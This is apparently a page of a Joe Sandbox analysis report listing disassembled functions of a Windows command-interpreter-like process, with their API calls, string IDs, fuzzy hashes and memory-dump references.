                                                                      • Opcode ID: 75fa4a4d9abd07e5f262c6a063e5d1718eef9d74fe4a33f46ddbee0d6c327abf
                                                                      • Instruction ID: 0c73dfd41237e9e5f53d7b2061adf20fbb233b93e1fb232accb0c2e256aa17e7
                                                                      • Opcode Fuzzy Hash: 75fa4a4d9abd07e5f262c6a063e5d1718eef9d74fe4a33f46ddbee0d6c327abf
                                                                      • Instruction Fuzzy Hash: EE01F5B1700344A7D7788624DC0AB6BB7C9EBC0351F10453EB95AC7241DAA6EC0082A5
                                                                      Function 0005742D Relevance: 4.5, APIs: 3, Instructions: 28COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _callnewh.MSVCRT ref: 00057437
                                                                        • Part of subcall function 000574D1: ??0exception@@QAE@ABQBDH@Z.MSVCRT(000577EC,00000001), ref: 000574E7
                                                                      • malloc.MSVCRT ref: 00057444
                                                                      • _CxxThrowException.MSVCRT(?,0006CBF8), ref: 000577F5
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: ??0exception@@ExceptionThrow_callnewhmalloc
                                                                      • String ID:
                                                                      • API String ID: 813871643-0
                                                                      • Opcode ID: adbb71830d6593cdd830ff95bd9270507eb766e4b1a3336701d06a3bf27f23e0
                                                                      • Instruction ID: d22c9d404f4cc57dbff5ee0e4bce190832beae237f7e31422e347e6173137fed
                                                                      • Opcode Fuzzy Hash: adbb71830d6593cdd830ff95bd9270507eb766e4b1a3336701d06a3bf27f23e0
                                                                      • Instruction Fuzzy Hash: 86E0D83540C10DB78F206665FC09DEF3F6D5B40322B148465BD1D96452EF30D949F9D1
                                                                      Function 00045EA3 Relevance: 3.3, APIs: 2, Instructions: 292COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • memset.MSVCRT ref: 00045EFB
                                                                        • Part of subcall function 0004E3F0: memset.MSVCRT ref: 0004E455
                                                                        • Part of subcall function 00048E9E: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,00088BF0,00000000,?), ref: 00048EC3
                                                                        • Part of subcall function 0004BC30: wcschr.MSVCRT ref: 0004BCA7
                                                                        • Part of subcall function 0004BC30: iswspace.MSVCRT ref: 0004BD1D
                                                                        • Part of subcall function 0004BC30: wcschr.MSVCRT ref: 0004BD39
                                                                        • Part of subcall function 0004BC30: wcschr.MSVCRT ref: 0004BD5D
                                                                        • Part of subcall function 00050060: wcschr.MSVCRT ref: 0005006C
                                                                      • ??_V@YAXPAX@Z.MSVCRT(?), ref: 00045FF7
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: wcschr$memset$CurrentDirectoryiswspace
                                                                      • String ID:
                                                                      • API String ID: 4234405029-0
                                                                      • Opcode ID: 29351ef153f097518fb04155f64e0e1151bc7499564b9931b3ec447d7d36143d
                                                                      • Instruction ID: 5fa6b06402ab4296d8947e23499bc11b6d2119cc6ed198286c8cb9504b4148c9
                                                                      • Opcode Fuzzy Hash: 29351ef153f097518fb04155f64e0e1151bc7499564b9931b3ec447d7d36143d
                                                                      • Instruction Fuzzy Hash: B1A1B0B16083419BE768DB20C85967F77E5EF85301F04883EF88AC7291EB78D949CB56
                                                                      Function 0004E470 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 152COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: memset
                                                                      • String ID: COMSPEC
                                                                      • API String ID: 2221118986-1631433037
                                                                      • Opcode ID: 7ba2d1021bd792f4e2e1ba9f92b7ced311a42168f81484bdb0e244ea4ce32dd1
                                                                      • Instruction ID: dc548e743ab976efe497fb89f5da73ab204329afe7745ed0824d80e5fd853b14
                                                                      • Opcode Fuzzy Hash: 7ba2d1021bd792f4e2e1ba9f92b7ced311a42168f81484bdb0e244ea4ce32dd1
                                                                      • Instruction Fuzzy Hash: 9041F7F0B04AC08BDBB46B28D95576E73C5BFD4748F14097AE90683292FA64DC44839F
                                                                      Function 00056E30 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3_catch.LIBCMT ref: 00056E37
                                                                        • Part of subcall function 0005742D: malloc.MSVCRT ref: 00057444
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog3_catchmalloc
                                                                      • String ID:
                                                                      • API String ID: 125873668-0
                                                                      • Opcode ID: 717ca51db1500f464121de397375ffb505e81a2bf6d2ac6b44e195e5bcf62e73
                                                                      • Instruction ID: ddc85e01682f29736e027ed22e7b0854d44017b7a33594b9daf39a7fbc39f268
                                                                      • Opcode Fuzzy Hash: 717ca51db1500f464121de397375ffb505e81a2bf6d2ac6b44e195e5bcf62e73
                                                                      • Instruction Fuzzy Hash: 2AC08C2D22D110D6CB803790F00379F2A10AB10B03F908004BC092A083DE79451C3B51
                                                                      Function 00051A05 Relevance: 1.3, APIs: 1, Instructions: 34COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: memset
                                                                      • String ID:
                                                                      • API String ID: 2221118986-0
                                                                      • Opcode ID: c7cf9a98dc1584943114782d0c303ac54ba92d830353226959649fadd31955bc
                                                                      • Instruction ID: 407618c5ee7a6c4e4857504ec7717705f890dad278163a737835d794b5999644
                                                                      • Opcode Fuzzy Hash: c7cf9a98dc1584943114782d0c303ac54ba92d830353226959649fadd31955bc
                                                                      • Instruction Fuzzy Hash: D7E0207774B2312BE12D54A4BC87F578B9DC7C0772F290035FE048B181D9D14C0842A4

                                                                      Non-executed Functions

                                                                      Function 00064191 Relevance: 65.1, APIs: 30, Strings: 7, Instructions: 353memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,?,00000000,00000001), ref: 000641B9
                                                                      • _get_osfhandle.MSVCRT ref: 000641CA
                                                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?), ref: 00064205
                                                                      • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00088E04), ref: 0006426C
                                                                      • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00069E02,?,00000010), ref: 00064283
                                                                      • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00088E04), ref: 00064292
                                                                      • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 000642B1
                                                                      • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 000642C4
                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 000642D2
                                                                      • RtlFreeHeap.NTDLL(00000000), ref: 000642D9
                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 0006432F
                                                                      • RtlFreeHeap.NTDLL(00000000), ref: 00064336
                                                                      • _wcsnicmp.MSVCRT ref: 000643DB
                                                                      • _wcsnicmp.MSVCRT ref: 000643F0
                                                                      • _wcsnicmp.MSVCRT ref: 00064405
                                                                      • _wcsnicmp.MSVCRT ref: 0006441A
                                                                      • _wcsnicmp.MSVCRT ref: 0006442F
                                                                      • _wcsnicmp.MSVCRT ref: 00064444
                                                                      • _wcsnicmp.MSVCRT ref: 00064459
                                                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,00000001,?), ref: 000644A5
                                                                      • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?), ref: 000644F0
                                                                      • FillConsoleOutputCharacterW.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,00000020,?,?,?), ref: 00064506
                                                                      • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,00000000), ref: 0006451D
                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 00064565
                                                                      • RtlFreeHeap.NTDLL(00000000), ref: 0006456C
                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,00000001), ref: 00064595
                                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 0006459C
                                                                      • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00088E04), ref: 000645C3
                                                                      • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00069E02,?,00000000), ref: 000645D4
                                                                      • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00088E04), ref: 000645DD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Console_wcsnicmp$LockProcessShared$Free$AcquireBufferCriticalInfoReadReleaseScreenSection$AllocCharacterCursorEnterFillHandleLeaveOutputPositionWrite_get_osfhandle
                                                                      • String ID: cd $chdir $md $mkdir $pushd $rd $rmdir
                                                                      • API String ID: 2991647268-3100821235
                                                                      • Opcode ID: 8e96a86005ba007806fe733d7c1c3c8149e9f92198ed1118fedb83ec4aee8676
                                                                      • Instruction ID: 6c3eb5822dc463f993414619f6d20b382c687585798eba9b7e4667fbdde932a9
                                                                      • Opcode Fuzzy Hash: 8e96a86005ba007806fe733d7c1c3c8149e9f92198ed1118fedb83ec4aee8676
                                                                      • Instruction Fuzzy Hash: 48C1E370604301AFEB209F64DC49A2FBBE6FF89714F04492DF996C62A1D779CA44CB12
                                                                      Function 00044C10 Relevance: 33.8, APIs: 14, Strings: 5, Instructions: 552COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: [...]$ [..]$ [.]$...$:
                                                                      • API String ID: 0-1980097535
                                                                      • Opcode ID: 72530779a8b6be9bc474fe07c4fba1229b4dc9cc98c07d8826134ef6056f9bb5
                                                                      • Instruction ID: 184718481f7777fe2a0be1e05f43ed1b98fb23db2f831d11a2ae10723cd63450
                                                                      • Opcode Fuzzy Hash: 72530779a8b6be9bc474fe07c4fba1229b4dc9cc98c07d8826134ef6056f9bb5
                                                                      • Instruction Fuzzy Hash: A312D2B02083419BD764DF24C885AAFB7E9EF88345F00892DFD89D7291EB34D949CB56
                                                                      Function 00046854 Relevance: 30.1, APIs: 14, Strings: 3, Instructions: 366timeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetSystemTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,0006E590,?,00002000), ref: 00046896
                                                                      • SystemTimeToFileTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 000468AA
                                                                      • FileTimeToLocalFileTime.API-MS-WIN-CORE-FILE-L1-1-0(?,?), ref: 000468BE
                                                                      • FileTimeToSystemTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 000468D2
                                                                      • realloc.MSVCRT ref: 0005A5E7
                                                                        • Part of subcall function 00048791: GetUserDefaultLCID.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00046906,0000001F,?,00000080), ref: 00048791
                                                                      • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000001F,?,00000080), ref: 00046907
                                                                      • GetDateFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000000,?,?), ref: 0004698F
                                                                      • memmove.MSVCRT(?,?,?), ref: 00046A86
                                                                      • GetDateFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000000,?,?,00000000,00000000), ref: 00046AAF
                                                                      • realloc.MSVCRT ref: 00046ACA
                                                                      • GetDateFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000000,?,?,00000000,00000001), ref: 00046AFE
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: Time$File$DateFormatSystem$realloc$DefaultInfoLocalLocaleUsermemmove
                                                                      • String ID: %02d%s%02d%s%02d$%s $%s %s
                                                                      • API String ID: 2927284792-4023967598
                                                                      • Opcode ID: 516ae6eb39fa9806536a9e62bdabaac7f0805fb6c9ce7c54cbe0b817221dd4ae
                                                                      • Instruction ID: af96ea451ec4c917b3ef99062d28e1dfe601cea9f93a737f0ef1cce899fea14a
                                                                      • Opcode Fuzzy Hash: 516ae6eb39fa9806536a9e62bdabaac7f0805fb6c9ce7c54cbe0b817221dd4ae
                                                                      • Instruction Fuzzy Hash: CDC108B2A006259FEF24DF54CC44AEF73B8EB45301F1441BAE90AE7141EA359E84CF56
                                                                      Function 00054EC1 Relevance: 26.6, APIs: 14, Strings: 1, Instructions: 395fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • memset.MSVCRT ref: 00054F03
                                                                        • Part of subcall function 0004E3F0: memset.MSVCRT ref: 0004E455
                                                                      • FindFirstFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,-00000001), ref: 00054F67
                                                                      • FindClose.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,-00000001), ref: 00054F77
                                                                      • FindFirstFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00042670,?,?,?,-00000001), ref: 00054FEB
                                                                      • FindNextFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,?,?,-00000001), ref: 00055103
                                                                      • FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,-00000001), ref: 0005511E
                                                                      • ??_V@YAXPAX@Z.MSVCRT(?,-00000001), ref: 00055141
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: Find$File$CloseFirstmemset$Next
                                                                      • String ID: \\?\
                                                                      • API String ID: 3059144641-4282027825
                                                                      • Opcode ID: 7d913f963ca2a1a68a6c06900cac05c2447bf88c4d239717a0fa29dbe5e5af77
                                                                      • Instruction ID: 35d04bc5c5cfc21a124b39898769e40f298c75aaf39be6284beba1791b0885ee
                                                                      • Opcode Fuzzy Hash: 7d913f963ca2a1a68a6c06900cac05c2447bf88c4d239717a0fa29dbe5e5af77
                                                                      • Instruction Fuzzy Hash: 15E11F71A006098BEB34DB68CC95BFF73B9EF54306F4404A9E90AD7182E7359E89CB54
                                                                      Function 0006769E Relevance: 19.7, APIs: 7, Strings: 4, Instructions: 464COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(73B29366,00000000,?), ref: 00067710
                                                                      • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00067722
                                                                        • Part of subcall function 0004EC2E: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,0006E590,00002000,?,00088BF0,00000000,?,?,00048F0D), ref: 0004EC51
                                                                      • towupper.MSVCRT ref: 000678BC
                                                                      • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 000679F1
                                                                      • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,00041F8C,00043B98), ref: 00067B15
                                                                      • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,73B29366,00000000,?), ref: 00067D0D
                                                                      • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00067D20
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalSection$EnterLeave$DriveEnvironmentFreeLocalTypeVariabletowupper
                                                                      • String ID: %s $%s>$PROMPT$Unknown
                                                                      • API String ID: 708651206-3050974680
                                                                      • Opcode ID: 77e576e0e8471c6d90238c57d47edf84cb079cfda95399dc5050e6b75b968e94
                                                                      • Instruction ID: 85aed7aeea01c2b9e37c8ba706c7b8bc8ec5e207f5c5b9955c196ef36667b893
                                                                      • Opcode Fuzzy Hash: 77e576e0e8471c6d90238c57d47edf84cb079cfda95399dc5050e6b75b968e94
                                                                      • Instruction Fuzzy Hash: 94021474A051158BDB74EF28CC09ABAB7B6FF84314F4482AAE40DA7251EB345E81CF95
                                                                      Function 0006C1FA Relevance: 19.7, APIs: 13, Instructions: 179filememorynativeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 0006C135: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,?), ref: 0006C14E
                                                                        • Part of subcall function 0006C135: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000008,?,00000000,00000000,?), ref: 0006C16A
                                                                        • Part of subcall function 0006C135: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,?,?,00000000,00000000,?), ref: 0006C17B
                                                                      • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(40002749,00000001), ref: 0006C24F
                                                                      • CreateDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000001), ref: 0006C270
                                                                      • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,40000000,00000001,00000000,00000003,02000000,00000000), ref: 0006C293
                                                                      • RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 0006C2AE
                                                                      • memset.MSVCRT ref: 0006C2EF
                                                                      • memcpy.MSVCRT(?,?,?), ref: 0006C324
                                                                      • memcpy.MSVCRT(?,00000000,?), ref: 0006C370
                                                                      • NtFsControlFile.NTDLL(?,00000000,00000000,00000000,?,000900A4,?,?,00000000,00000000), ref: 0006C392
                                                                      • RtlNtStatusToDosError.NTDLL ref: 0006C39D
                                                                      • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 0006C3A4
                                                                      • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 0006C3B6
                                                                      • RtlFreeHeap.NTDLL(?,00000000,00000000), ref: 0006C3D1
                                                                      • RemoveDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 0006C3E2
                                                                        • Part of subcall function 0006C5F2: memset.MSVCRT ref: 0006C62E
                                                                        • Part of subcall function 0006C5F2: memset.MSVCRT ref: 0006C656
                                                                        • Part of subcall function 0006C5F2: GetVolumePathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,-00000105,-00000105,?,?,?,00000001,00000000,00000000), ref: 0006C6C7
                                                                        • Part of subcall function 0006C5F2: GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,00000001,00000000,00000000), ref: 0006C6E6
                                                                        • Part of subcall function 0006C5F2: GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,00000000,?,?,?,00000001,?,?,?,00000001,00000000,00000000), ref: 0006C72A
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: Path$ErrorName$Lastmemset$CreateDirectoryFileFullVolumememcpy$CloseControlDriveFreeHandleHeapInformationName_RemoveStatusType
                                                                      • String ID:
                                                                      • API String ID: 223857506-0
                                                                      • Opcode ID: a27dfe9dbec2a6b294fe757a527cea7294b439f486b77a6e7dcd1e4637ee8e64
                                                                      • Instruction ID: 4e9055fbd0696ad9eb75c2ffefbfe4402e16e593b7a33d3e11babc656648b85d
                                                                      • Opcode Fuzzy Hash: a27dfe9dbec2a6b294fe757a527cea7294b439f486b77a6e7dcd1e4637ee8e64
                                                                      • Instruction Fuzzy Hash: 1F51A271A00215AFEB149FB4DC49EBFB7B9EF48304B14816AE846E7251E739DE01CB64
                                                                      Function 0005589A Relevance: 15.1, APIs: 10, Instructions: 106memoryfileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • FindFirstFileExW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,?,00000000,00000000,00000002,00000000,00000000,?,000559D0,?,00046054,-00001038,00000000,?,?), ref: 000558BB
                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,000559D0,?,00046054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 000558CD
                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000014,?,000559D0,?,00046054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 00055944
                                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,000559D0,?,00046054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 0005594B
                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,?,000559D0,?,00046054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 0005596C
                                                                      • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,000559D0,?,00046054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 00055973
                                                                      • FindNextFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,000559D0,?,00046054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 0005598F
                                                                      • FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,000559D0,?,00046054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 000559B6
                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,000559D0,?,00046054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 0006160B
                                                                      • FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,000559D0,?,00046054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 00061618
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
